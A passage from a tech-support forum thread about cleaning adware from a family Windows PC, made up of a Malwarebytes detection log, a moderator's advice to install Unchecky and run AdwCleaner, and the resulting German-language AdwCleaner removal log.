PUP.Optional.MiniBar.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{AA74D58F-ACD0-450D-A85E-6C04B171C044}, , [6a2f4c7dcab1072fe67ce7c38d755da3], 
PUP.Optional.MiniBar.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{AA74D58F-ACD0-450D-A85E-6C04B171C044}, , [6a2f4c7dcab1072fe67ce7c38d755da3], 
PUP.Optional.MiniBar.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{AA74D58F-ACD0-450D-A85E-6C04B171C044}, , [6a2f4c7dcab1072fe67ce7c38d755da3], 
PUP.Optional.Delta.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{C1AF5FA5-852C-4C90-812E-A7F75E011D87}, , [fb9e03c67a010a2c44477f29db27fb05], 
PUP.Optional.Delta.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{C1AF5FA5-852C-4C90-812E-A7F75E011D87}, , [fb9e03c67a010a2c44477f29db27fb05], 
PUP.Optional.Delta.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{C1AF5FA5-852C-4C90-812E-A7F75E011D87}, , [fb9e03c67a010a2c44477f29db27fb05], 
PUP.Optional.MySearchDial.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}, , [d6c34b7e8cef9e9825270e9b758dbb45], 
PUP.Optional.MySearchDial.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}, , [d6c34b7e8cef9e9825270e9b758dbb45], 
PUP.Optional.Yontoo.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{FD72061E-9FDE-484D-A58A-0BAB4151CAD8}, , [c0d9fecb3f3cb185e958b8b9020041bf], 
PUP.Optional.Yontoo.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{FD72061E-9FDE-484D-A58A-0BAB4151CAD8}, , [c0d9fecb3f3cb185e958b8b9020041bf], 
PUP.Optional.Yontoo.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{FD72061E-9FDE-484D-A58A-0BAB4151CAD8}, , [c0d9fecb3f3cb185e958b8b9020041bf], 
PUP.Optional.DefaultTab.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{B2D33ED6-EBBD-467C-BF6F-F175D9B51363}, , [ff9af9d07cfff3437e4782f4768c6997], 
PUP.Optional.DefaultTab.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{BAD84EE2-624D-4e7c-A8BB-41EFD720FD77}, , [f9a0aa1f2358181ec204571f3ac833cd], 
PUP.Optional.SmartBar.A, HKLM\SOFTWARE\CLASSES\Bechiro.smartbarappCore, , [6a2f8544a2d92511e0b8c3459e65aa56], 
PUP.Optional.SmartBar.A, HKLM\SOFTWARE\CLASSES\Bechiro.smartbarappCore.1, , [8514f4d5b7c4290d6a2eca3e58abfa06], 
PUP.Optional.SmartBar.A, HKLM\SOFTWARE\CLASSES\esrv.smartbarESrvc, , [03968a3fc3b8a88ea8f1a66209faae52], 
PUP.Optional.SmartBar.A, HKLM\SOFTWARE\CLASSES\esrv.smartbarESrvc.1, , [2871ffca512a13232c6da5633ac906fa], 
PUP.Optional.SmartBar.A, HKLM\SOFTWARE\WOW6432NODE\BECHIRO S.L.\smartbar, , [bfda19b00c6f1d1970264bbd1fe4956b], 
PUP.Optional.SmartBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Bechiro.smartbarappCore, , [c5d460690972ee48cdcb3ccc9b68ca36], 
PUP.Optional.SmartBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Bechiro.smartbarappCore.1, , [8e0bccfdb3c857df8b0d2bddd82b857b], 
PUP.Optional.SmartBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\esrv.smartbarESrvc, , [3960b8115b204bebdfba3bcd46bd15eb], 
PUP.Optional.SmartBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\esrv.smartbarESrvc.1, , [f4a528a1433853e3b4e529df44bf27d9], 
PUP.Optional.DefaultTab.A, HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\DefaultTab, , [f1a8a7229edd0531645e55c2e41f29d7], 
PUP.Optional.SmartBar.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\BECHIRO S.L.\smartbar, , [c1d8bb0e84f773c38215f4146a997888], 
PUP.Optional.SearchPage.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{4A720000-424D-40a9-A87E-3EBD3E7536CA}, , [b0e9b316afcc1b1b04872026ce3603fd], 
Trojan.Agent, HKU\S-1-5-21-4169419405-2626366916-160398126-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\WOW6432NODE\Internet Explorer, , [c7d277524a31df571657ccb721e231cf], 
PUP.Optional.BonanzaDeals.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\BonanzaDealsLive, , [abee715893e86bcbe03b6fc4729259a7], 
PUP.Optional.SProtector.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SProtector, , [badf16b30a71ba7c6c1adf4e9d6737c9], 
PUP.Optional.CrossRider.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\Crossrider, , [c1d8ebde621981b590c8ad92dd27c13f], 
PUP.Optional.DefaultTab.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\DefaultTab, , [6831a425b1cabd79dfe3f91eda297d83], 
PUP.Optional.PriceGong.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\PriceGong, , [f0a9bc0d2c4f5ed8be80828d27dc2ed2], 
PUP.Optional.BProtector.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\BPROTECTSETTINGS, , [5940b91083f895a138fd240ab74dc838], 
PUP.Optional.BonanzaDeals.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1004.bak-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\BonanzaDealsLive, , [534610b9d2a95cdaf92286ad4eb635cb], 
PUP.Optional.SProtector.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1004.bak-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SProtector, , [2f6a62676318ff378bfb89a45da7e818], 
PUP.Optional.DefaultTab.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1004.bak-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\DefaultTab, , [c0d9ba0f285373c3932f05128a79db25], 
PUP.Optional.PriceGong.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1004.bak-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\PriceGong, , [19804b7e95e670c669d50f0050b3ef11], 
PUP.Optional.BonanzaDeals.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1006-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\BonanzaDealsLive, , [d2c79831bfbc979f3ddea68d8c784bb5], 
PUP.Optional.SProtector.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1006-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SProtector, , [4a4f7c4d4d2eb284a7df4de0db29c13f], 
PUP.Optional.DefaultTab.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1006-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\DefaultTab, , [8118efdad3a8979f06bc5eb935cefc04], 
PUP.Optional.PriceGong.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1006-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\PriceGong, , [4455cbfe0b70122452ec2fe0cb382ed2], 
PUP.Optional.BonanzaDeals.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\BonanzaDealsLive, , [811881481863191d69b2d360fa0a23dd], 
PUP.Optional.SProtector.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SProtector, , [801922a77dfe02345432909d3ec6fd03], 
PUP.Optional.CrossRider.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\Crossrider, , [544565643942fa3c1b3d7ac5ca3adb25], 
PUP.Optional.DefaultTab.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\DefaultTab, , [891098317a01cc6aefd3ab6c6e95c53b], 
PUP.Optional.PriceGong.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\PriceGong, , [6336537699e246f0b38bc04f35ce7d83], 
PUP.Optional.BProtector.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\BPROTECTSETTINGS, , [5c3dae1be79424120233002eb4507888], 
PUP.Optional.Softonic.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\SOFTONIC\Universal Downloader, , [49508940bdbeaa8ca545ea197192c937], 
PUP.Optional.SProtector.A, HKU\S-1-5-21-4169419405-2626366916-160398126-501-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SProtector, , [9affdcedf2894aeca7dfce5fe81c926e], 
PUP.Optional.DefaultTab.A, HKU\S-1-5-21-4169419405-2626366916-160398126-501-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\DefaultTab, , [80198a3f126970c64a7870a7d92ae21e], 
PUP.Optional.PriceGong.A, HKU\S-1-5-21-4169419405-2626366916-160398126-501-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\PriceGong, , [79209a2fa0dbc373122c7d923ec511ef], 
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 17
PUP.Optional.SmartBar.A, C:\Users\Papa\AppData\Roaming\Bechiro S.L, , [8c0da22788f3d75f771d3bcd08fb837d], 
Trojan.Downloader, C:\ProgramData\0, , [c4d5c801bdbec76fca88cfde03ff1de3], 
Trojan.Downloader, C:\ProgramData\0\Setup, , [c4d5c801bdbec76fca88cfde03ff1de3], 
PUP.Optional.SearchNewTab, C:\ProgramData\SearchNewTab, , [4554eedb403b7eb803c5ead2b44eb64a], 
PUP.Optional.OptimizerPro.A, C:\ProgramData\InstallMate\OptimizerPro, , [b2e74089ccaf87af14d14775c53d768a], 
PUP.Optional.DefaultTab.A, C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc, , [aaefb316e4973ef865089a279d65c23e], 
PUP.Optional.DefaultTab.A, C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc, , [a3f60bbe7b00b284d796ead789791ce4], 
PUP.Optional.DefaultTab.A, C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc, , [6732cffa5b2085b1323b5c653fc360a0], 
PUP.Optional.SmartBar.A, C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\flcjcajklmlbpmgckpcmnampagbhhmcp, , [9009caffc7b4b0860b4ebe056d9508f8], 
PUP.Optional.SmartBar.A, C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Extensions\flcjcajklmlbpmgckpcmnampagbhhmcp, , [aced9e2be9924aecd4859d26d13113ed], 
PUP.Optional.MySpeedDial.A, C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pflphaooapbgpeakohlggbpidpppgdff, , [148591380774bb7bbbfb9336d72b1ee2], 
PUP.Optional.Yontoo.A, C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\niapdbllcanepiiimjjndipklodoedlc, , [2e6b9e2bc2b99e9850d8af1c9d651fe1], 
PUP.Optional.Yontoo.A, C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Extensions\niapdbllcanepiiimjjndipklodoedlc, , [efaa8544b5c66fc7f92f894242c0eb15], 
PUP.Optional.CrossRider.A, C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kmkdohofefokfmbnlbgebdapndacfklg, , [26739b2eee8dc0769cf00bc4bd458b75], 
PUP.Optional.Conduit.A, C:\Users\Papa\AppData\LocalLow\uTorrentBar_DE, , [70299a2fe09bd95d4e759f344eb49d63], 
PUP.Optional.Conduit.A, C:\Users\Papa\AppData\LocalLow\uTorrentBar_DE\Logs, , [70299a2fe09bd95d4e759f344eb49d63], 
PUP.Optional.Conduit.A, C:\Users\Papa\AppData\LocalLow\uTorrentBar_DE\MyStuffApps, , [70299a2fe09bd95d4e759f344eb49d63], 
 
Files: 34
Adware.Agent, C:\ProgramData\InstallMate\{97E40D95-15C8-46D5-A43E-5DEA4C072F63}\Custom.dll, , [3069f1d80675be78a36a81daf60b34cc], 
Adware.Agent, C:\ProgramData\InstallMate\{F46A1A8D-F236-4761-A58A-BA142F89387B}\Custom.dll, , [029765644338e94deb22f467e1206e92], 
PUP.Optional.MultiPlug.A, C:\ProgramData\SearchNewTab\s62eZVg.exe, , [84151faac9b203335585ef32b0502bd5], 
Trojan.FakeMS.ED, C:\Users\Papa\AppData\Roaming\mrsys.exe, , [ebae1aaf304b54e29d2b67054eb223dd], 
Hacktool.CheatEngine, C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\The Forest V0.2 Trainer +6 MrAntiFun.EXE, , [b4e506c3fb80e452d867251515ebcc34], 
RiskWare.Tool.CK, C:\Users\Papa\Downloads\Command[1].and.Conquer.3.Kanes.Wrath.GENERIC_KEYGEN-FFF.zip, , [b8e1c90092e9dc5a2191608214f0659b], 
PUP.Optional.OpenCandy, C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\fraps-3.5.99.exe, , [a6f3ebdeb6c566d05ed116ebfd08d42c], 
PUP.Riskware.Patcher, C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\I_D_M+6.16+b3.zip, , [cdcc72572b5033033e2598750ef32ad6], 
Hacktool.CheatEngine, C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\The Forest V0.1 Trainer +3 MrAntiFun.zip, , [1f7a5c6de596270f63dc8eac738df60a], 
Hacktool.CheatEngine, C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\DeadTrigger2v003x64.rar, , [4d4cd7f2fe7d41f598a71b1f60a0748c], 
Trojan.FakeMS.ED, C:\Users\Papa\AppData\Local\.exe, , [ff9aa821c3b82a0c0eba9ad2867a748c], 
PUP.Optional.Amonetize.A, C:\Users\Papa\AppData\Local\26869\trz92AD.tmp, , [a6f31eab5229c86e4e238ac16f91b44c], 
PUP.Optional.InstallMonetizer.A, C:\Users\Papa\AppData\Local\DM\install.exe, , [4b4e94352952bb7b94b2d162ad54639d], 
Trojan.FakeMS.ED, C:\Windows\system\.exe, , [485111b8116ac76f854376f6fa064eb2], 
PUP.Optional.ContinueToSave.A, C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_continuetosave.info_0.localstorage, , [f1a818b143382511e6362fbb877b57a9], 
PUP.Optional.MySearchDial.A, C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_start.mysearchdial.com_0.localstorage, , [fc9da524e695ba7c56aaaf3e0ef43cc4], 
PUP.Optional.MySearchDial.A, C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_start.mysearchdial.com_0.localstorage-journal, , [1782d3f6c4b77abc0000d21b22e0659b], 
PUP.Optional.SmartBar.A, C:\Users\Papa\AppData\Roaming\Bechiro S.L\sqlite3.dll, , [8c0da22788f3d75f771d3bcd08fb837d], 
PUP.Optional.SaveShare.A, C:\Program Files (x86)\SaveShare\sprotector.dll, , [bfdaddec83f8e5518eef85a5fc08619f], 
PUP.Optional.SearchNewTab, C:\ProgramData\SearchNewTab\s62eZVg.dat, , [4554eedb403b7eb803c5ead2b44eb64a], 
PUP.Optional.OptimizerPro.A, C:\ProgramData\InstallMate\OptimizerPro\Custom.dll, , [b2e74089ccaf87af14d14775c53d768a], 
PUP.Optional.OptimizerPro.A, C:\ProgramData\InstallMate\OptimizerPro\Readme.txt, , [b2e74089ccaf87af14d14775c53d768a], 
PUP.Optional.OptimizerPro.A, C:\ProgramData\InstallMate\OptimizerPro\Setup.dat, , [b2e74089ccaf87af14d14775c53d768a], 
PUP.Optional.OptimizerPro.A, C:\ProgramData\InstallMate\OptimizerPro\Setup.exe, , [b2e74089ccaf87af14d14775c53d768a], 
PUP.Optional.OptimizerPro.A, C:\ProgramData\InstallMate\OptimizerPro\Setup.ico, , [b2e74089ccaf87af14d14775c53d768a], 
PUP.Optional.OptimizerPro.A, C:\ProgramData\InstallMate\OptimizerPro\TsuDll.dll, , [b2e74089ccaf87af14d14775c53d768a], 
PUP.Optional.OptimizerPro.A, C:\ProgramData\InstallMate\OptimizerPro\_Setup.dll, , [b2e74089ccaf87af14d14775c53d768a], 
PUP.Optional.MySpeedDial.A, C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pflphaooapbgpeakohlggbpidpppgdff\000005.ldb, , [148591380774bb7bbbfb9336d72b1ee2], 
PUP.Optional.MySpeedDial.A, C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pflphaooapbgpeakohlggbpidpppgdff\000006.log, , [148591380774bb7bbbfb9336d72b1ee2], 
PUP.Optional.MySpeedDial.A, C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pflphaooapbgpeakohlggbpidpppgdff\CURRENT, , [148591380774bb7bbbfb9336d72b1ee2], 
PUP.Optional.MySpeedDial.A, C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pflphaooapbgpeakohlggbpidpppgdff\LOCK, , [148591380774bb7bbbfb9336d72b1ee2], 
PUP.Optional.MySpeedDial.A, C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pflphaooapbgpeakohlggbpidpppgdff\LOG, , [148591380774bb7bbbfb9336d72b1ee2], 
PUP.Optional.MySpeedDial.A, C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pflphaooapbgpeakohlggbpidpppgdff\LOG.old, , [148591380774bb7bbbfb9336d72b1ee2], 
PUP.Optional.MySpeedDial.A, C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pflphaooapbgpeakohlggbpidpppgdff\MANIFEST-000004, , [148591380774bb7bbbfb9336d72b1ee2], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)

  • 0

#12
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Could you attach a screenshot of the Avast alert .
 
As you appear to be downloading a lot of programmes I would recommend that you use this

A small tool that may help when you download programmes

http://unchecky.com/

Click on the link above to be taken to Unchecky.com
click the very large Download button.
click Save
Click Open folder


Right click on the Unchecky_setupuncheckysetupicon.png or folder and choose to Run as Administrator

Once open click the Install button.

uncheckysetupwindow.png

Then click on Finish

uncheckyfinishsetupwindow.png

Unchecky is now installed and will help you keep unwanted check boxes unchecked ;)

THEN

Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click on Scan.
  • After the scan is complete click on "Clean"
  • Confirm each time with Ok.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner[S1].txt as well.

  • 0

#13
langvu900

langvu900

    Member

  • Topic Starter
  • Member
  • PipPip
  • 11 posts

Sorry, i really don't know how to upload the img of the pop-up. Can you please show me in the next post. And here is the log file:

 

# AdwCleaner v3.308 - Bericht erstellt am 23/08/2014 um 10:00:03
# Aktualisiert 20/08/2014 von Xplode
# Betriebssystem : Windows 7 Home Premium  (64 bits)
# Benutzername : Papa - FAMILIE-LE-NB
# Gestartet von : C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\AdwCleaner.exe
# Option : Löschen
 
***** [ Dienste ] *****
 
 
***** [ Dateien / Ordner ] *****
 
Ordner Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\eooncjejnppfjjklapaamhcdmjbilmde
Ordner Gelöscht : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
Ordner Gelöscht : C:\Users\ASPNET\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
Ordner Gelöscht : C:\Users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
Ordner Gelöscht : C:\Users\Mama\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\ASPNET\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Mama\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\ASPNET\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Mama\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf
Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf
Ordner Gelöscht : C:\Users\Mama\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf
[!] Ordner Gelöscht : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\ASPNET\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Mama\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\ASPNET\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Mama\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf
[!] Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf
[!] Ordner Gelöscht : C:\Users\Mama\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf
